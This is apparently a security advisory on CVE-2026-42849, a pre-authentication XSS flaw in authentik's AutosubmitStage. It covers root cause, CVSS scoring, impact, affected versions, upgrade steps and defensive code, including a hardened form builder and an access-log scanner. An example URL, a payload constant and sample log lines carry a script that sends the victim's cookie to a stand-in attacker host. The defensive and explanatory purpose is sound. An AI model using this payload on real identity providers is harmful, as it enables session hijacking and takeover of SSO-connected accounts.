CVE-2026-42849: authentik XSS in AutosubmitStage
A critical cross-site scripting (XSS) vulnerability tracked as CVE-2026-42849 has been disclosed in authentik, a widely deployed open-source identity provider. With a CVSS v3.1 score of 9.3 (Critical), the flaw is present in the AutosubmitStage component of the Simple Flow Executor (SFE) — a subsystem specifically designed to maintain compatibility with legacy browsers. An attacker who can influence the flow execution context can inject and execute arbitrary JavaScript in the victim's browser session.
The vulnerability was published on June 2, 2026, and affects all authentik versions prior to 2025.12.5 and 2026.2.3, which contain the official patch.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-42849 |
| CVSS Score | 9.3 (Critical) |
| CWE Classification | CWE-79 — Improper Neutralization of Input During Web Page Generation (XSS) |
| Affected Component | AutosubmitStage in the Simple Flow Executor (SFE) |
| Attack Vector | Network |
| Authentication Required | None (pre-authentication context) |
| Primary Impact | Cross-Site Scripting → Session Hijacking, Credential Theft |
| Patch Available | Yes — versions 2025.12.5 and 2026.2.3 |
| Source | NVD / NIST |
Technical Details
Root Cause
The Simple Flow Executor (SFE) in authentik was implemented with interface adjustments to improve compatibility with older, legacy browsers. In this context, the AutosubmitStage — which auto-submits authentication flow forms — fails to properly sanitize or encode attacker-influenced input before rendering it into the DOM.
Because the SFE operates in an authentication flow context (often at the login boundary), the XSS surface is pre-authentication and does not require the attacker to hold any valid session or credentials. An attacker who can supply a crafted URL, parameter, or redirect value can inject JavaScript that executes in the context of the authentik login page.
Why This Is Critical
Identity providers occupy a privileged position in enterprise security architecture:
- Single sign-on (SSO) scope — authentik typically brokers access to dozens or hundreds of downstream applications. Compromising the IdP session gives an attacker access to all connected services.
- Pre-authentication attack surface — the XSS fires before the user completes login, meaning even cautious users with MFA may be exposed.
- Credential harvesting — injected scripts can intercept credentials, TOTP codes, or session tokens entered into authentik's login flows.
- Session hijacking — stolen session cookies from the IdP allow direct impersonation across all SSO-protected apps for as long as the session remains valid.
Exploitation Flow
Attacker crafts malicious URL containing injected script payload
→ Victim follows link (phishing, redirect, stored link)
→ authentik SFE AutosubmitStage renders payload unsanitized
→ JavaScript executes in victim's browser (authentik domain)
→ Session tokens, credentials, or TOTP exfiltrated to attacker
→ Attacker impersonates victim across all SSO-connected apps
Example conceptual injection vector (the `next` parameter is used here for illustration; the vulnerable input is whichever attacker-influenced value the stage renders without encoding):

```
https://auth.example.com/if/flow/default-authentication-flow/?next=<script>document.location='https://attacker.com/?c='+document.cookie</script>
```
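To make the root cause and the exploitation flow above concrete, the following is an added example written for this page, not authentik's own code: an auto-submit form builder in the vulnerable pattern (string concatenation into markup) beside a hardened version. It uses Node's WHATWG `URL`; every function and variable name, the IdP origin and the flow URL are hypothetical, and the payload is constructed from the conceptual vector above.

```javascript
// Added example, not authentik's code. All names (buildAutosubmitFormUnsafe,
// buildAutosubmitFormSafe, escapeHtml, hasHttpScheme, isSafeNext, IDP_ORIGIN,
// ACTION) are hypothetical.

const IDP_ORIGIN = 'https://auth.example.com'; // assumed IdP origin

// Vulnerable pattern: values taken from the flow context (or the request)
// are concatenated straight into markup that later lands in innerHTML or an
// unescaped template. A value such as "><script>...</script> closes the
// attribute and runs in the IdP's origin.
function buildAutosubmitFormUnsafe(action, fields) {
  let html = `<form method="POST" action="${action}">`;
  for (const [name, value] of Object.entries(fields)) {
    html += `<input type="hidden" name="${name}" value="${value}">`;
  }
  return html + '</form>';
}

// Hardened pattern, step 1: encode every dynamic value for the HTML attribute
// context so markup characters cannot alter the page structure.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Hardened pattern, step 2: escaping does not neutralise a javascript: URL in
// the form action (the browser executes it on submit), so the action must be
// an http(s) URL. In practice it should come from server-side provider
// configuration, never from the request.
function hasHttpScheme(url, base) {
  try {
    return /^https?:$/.test(new URL(url, base).protocol);
  } catch {
    return false;
  }
}

function buildAutosubmitFormSafe(action, fields, base) {
  if (!hasHttpScheme(action, base)) {
    throw new Error('form action must be an http(s) URL');
  }
  let html = `<form method="POST" action="${escapeHtml(action)}">`;
  for (const [name, value] of Object.entries(fields)) {
    html += `<input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`;
  }
  return html + '</form>';
}

// Hardened pattern, step 3: a client-supplied redirect target (the ?next=
// parameter in the conceptual vector) is accepted only as a same-origin path.
// Comparing the resolved origin catches protocol-relative forms such as
// //attacker.example and /\attacker.example that a prefix check alone misses.
function isSafeNext(next, idpOrigin) {
  if (typeof next !== 'string' || !next.startsWith('/')) return false;
  try {
    return new URL(next, idpOrigin).origin === new URL(idpOrigin).origin;
  } catch {
    return false;
  }
}

// Constructed attacker input modelled on the conceptual vector above.
const PAYLOAD = `"><script>document.location='https://attacker.example/?c='+document.cookie</script>`;
const ACTION = '/flows/-/default/authentication/'; // hypothetical flow URL

// Render the same attacker-controlled field both ways for comparison.
function demo() {
  return {
    unsafe: buildAutosubmitFormUnsafe(ACTION, { next: PAYLOAD }),
    safe: buildAutosubmitFormSafe(ACTION, { next: PAYLOAD }, IDP_ORIGIN),
  };
}
```

The unsafe output contains a live `<script>` element; the safe output carries the same bytes as `&quot;&gt;&lt;script&gt;...`, which the browser treats as attribute text. Escaping alone is not the whole fix: a `javascript:` URL in `action` or an external host in `next` survives escaping unchanged, which is why the two URL checks sit beside it.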
The CVSS score of 9.3 corresponds to the vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N:
- Attack Vector: Network — no physical or local access required
- Attack Complexity: Low — no special conditions beyond a crafted link
- Privileges Required: None — consistent with the pre-authentication context
- User Interaction: Required — the victim must open the malicious URL
- Scope: Changed — script runs in the IdP origin and affects the downstream applications that trust it
- Confidentiality/Integrity Impact: High; Availability Impact: None
Impact Assessment
| Impact Area | Description |
|---|---|
| Session Hijacking | Steal authentik session cookies to impersonate the victim |
| Credential Theft | Capture passwords and TOTP codes typed into authentik flows; passkeys cannot be extracted, but script running on the IdP origin can still drive a WebAuthn ceremony and use the resulting assertion |
| SSO Account Takeover | Gain access to all applications integrated via authentik SSO |
| Downstream App Access | All OAuth2/OIDC/SAML apps trusting the compromised IdP are at risk |
| Privilege Escalation | If victim is an admin, attacker inherits admin-level authentik access |
| Persistent Access | Stolen session tokens may persist until expiry or manual revocation |
Affected Versions
| Version Branch | Affected | Fixed In |
|---|---|---|
| 2025.12.x | Yes — all versions prior to 2025.12.5 | 2025.12.5 |
| 2026.2.x | Yes — all versions prior to 2026.2.3 | 2026.2.3 |
| Older branches | Yes — all older releases | Upgrade required |
Remediation
Immediate Actions
- Upgrade authentik immediately to 2025.12.5 or 2026.2.3 (or newer). This is the only complete fix.

```bash
# Docker Compose upgrade example (set the authentik image tag to 2025.12.5 or
# 2026.2.3 in your compose file or .env first, otherwise the pull only
# refreshes the tag you already run)
docker compose pull
docker compose up -d
# Check current version
docker exec authentik-server ak version
```

- Audit active sessions — after upgrading, force session invalidation for any sessions that may have been active during the vulnerability window: authentik Admin UI → System → Sessions → Invalidate All.
- Review authentication flow logs — check authentik access logs for unusual redirect parameters or unexpected external domains in `?next=` parameters.
- Enable Content Security Policy (CSP) — if not already configured, deploy a strict CSP header that limits JavaScript execution sources; authentik's bundled Nginx config supports CSP header injection. A CSP only blocks this class of payload if it disallows inline scripts, and it is a mitigation rather than a substitute for the patch.
- Web Application Firewall (WAF) rules — consider deploying WAF rules to detect and block XSS payloads in authentik URL parameters as a temporary defense layer.
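For the log review step above, the following is an added example, not authentik's own tooling, that scans reverse-proxy access lines in front of authentik for hostile `next` values and reports why each was flagged. It assumes the Nginx/Apache combined log format, an IdP served at the hypothetical origin https://auth.example.com, and four constructed log lines (one benign, three suspicious).

```javascript
// Added example, not authentik's own tooling. IDP_ORIGIN and the log lines
// are constructed; scanAccessLog and classifyNext are hypothetical names.

const IDP_ORIGIN = 'https://auth.example.com';

// Constructed sample lines in combined log format: one benign, three hostile.
const SAMPLE_LOG = [
  '203.0.113.7 - - [02/Jun/2026:10:00:01 +0000] "GET /if/flow/default-authentication-flow/?next=%2Fapplication%2Fo%2Fgrafana%2F HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [02/Jun/2026:10:00:05 +0000] "GET /if/flow/default-authentication-flow/?next=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.example%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.11 - - [02/Jun/2026:10:00:09 +0000] "GET /if/flow/default-authentication-flow/?next=https%3A%2F%2Fattacker.example%2Flanding HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
  '198.51.100.4 - - [02/Jun/2026:10:00:12 +0000] "GET /if/flow/default-authentication-flow/?next=javascript%3Aalert%281%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
];

// client_ip, ident, user, [timestamp], then the request line.
const LINE_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP\/[\d.]+"/;

// Classify one decoded `next` value. Returns null when it looks benign.
// Order matters: markup characters are checked before URL parsing so that a
// script payload is reported as such even though it resolves as a same-origin
// relative path.
function classifyNext(next, idpOrigin) {
  if (/[<>"']/.test(next)) return 'html-metacharacters';
  let target;
  try {
    target = new URL(next, idpOrigin); // resolves //host and /\host forms too
  } catch {
    return 'unparseable';
  }
  if (!/^https?:$/.test(target.protocol)) return `scheme:${target.protocol}`;
  if (target.origin !== new URL(idpOrigin).origin) return `external-host:${target.host}`;
  return null;
}

// Walk the log, pull the `next` parameter from each request and collect findings.
function scanAccessLog(lines, idpOrigin) {
  const findings = [];
  for (const line of lines) {
    const m = LINE_RE.exec(line);
    if (!m) continue;
    const [, ip, path] = m;
    let req;
    try {
      req = new URL(path, idpOrigin);
    } catch {
      continue;
    }
    const next = req.searchParams.get('next'); // percent-decoded by URLSearchParams
    if (next === null) continue;
    const reason = classifyNext(next, idpOrigin);
    if (reason) findings.push({ ip, next, reason });
  }
  return findings;
}

// Running over the constructed sample reports the three hostile lines.
function demoFindings() {
  return scanAccessLog(SAMPLE_LOG, IDP_ORIGIN);
}
```

Pipe real lines in from `docker compose logs` or the proxy's access log and replace `SAMPLE_LOG`; the `reason` field separates likely XSS attempts (`html-metacharacters`, `scheme:javascript:`) from open-redirect probing (`external-host:`), which deserve different follow-up.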
Longer-Term Hardening
- Restrict authentik access to internal networks or VPN — reducing the attack surface for phishing-driven XSS exploitation
- Enable authentik's built-in event notifications for login anomalies and unexpected redirect chains
- Revoke OAuth2/OIDC tokens and SAML-backed sessions issued to downstream applications during the exposure window; this flaw does not expose client secrets, so rotating them is a lower-priority precaution
Context: XSS in Identity Providers
Cross-site scripting vulnerabilities in identity providers carry exceptional risk compared to XSS in ordinary web applications. Because an IdP is explicitly trusted by browsers and downstream applications to issue session tokens and identity assertions, successful exploitation is equivalent to a full account takeover across the entire SSO ecosystem.
The legacy-browser compatibility context of the SFE also highlights a common security tension: maintaining backwards compatibility introduces code paths that may not receive the same security scrutiny as modern code. Organizations operating authentik should treat this patch with the same urgency as a direct authentication bypass.
Key Takeaways
- CVE-2026-42849 is a CVSS 9.3 critical XSS in authentik's AutosubmitStage — upgrade to 2025.12.5 or 2026.2.3 immediately
- The pre-authentication attack surface means no valid credentials are required to exploit this flaw
- Successful exploitation gives attackers access to all SSO-connected applications, not just authentik
- Legacy browser compatibility code in the SFE introduced the vulnerability — a reminder that backcompat paths require equal security review
- After patching, invalidate all active sessions and audit authentication flow logs for signs of prior exploitation